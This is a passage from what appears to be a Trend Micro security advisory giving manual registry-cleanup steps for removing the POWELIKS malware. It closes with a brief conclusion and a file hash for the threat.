7: Terminating the dllhost process Right click and select “Kill Process Tree” Open Registry Editor (Run > regedit.exe) In the left panel, go to HKCU\SOFTWARE\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} Add Permissions to the user (see instructions on Adding Permission) In the right panel, delete the registry values “Default” and “a”. The whole CLSID cannot be deleted because of the presence of the blank key. If this is successful, the registry should look like this: Figure 8: Clean registry entries In the event that these values are recreated, it just means that POWELIKS is still running. Repeat step 3 to ensure that no dllhost.exe is still running. Close Registry Editor Conclusion The POWELIKS malware poses serious risks as its routines prevent it from being detected and removed from systems. In addition, one of its payloads is click fraud. To check if your systems are infected by this threat, perform the suggested removal actions on your systems. We also recommend users to install a security software that can detect such malicious files. Trend Micro protects users from this threat via the Trend Micro Smart Protection Network that detects the said malware.The following is the related hash for this threat: F2E179CB7307DF6190A783D5B72F1905C6F3BA3B – TROJ_POWELIKS.B With additional analysis from Ohlord Gagto Sursa: POWELIKS Levels Up With New Autostart Mechanism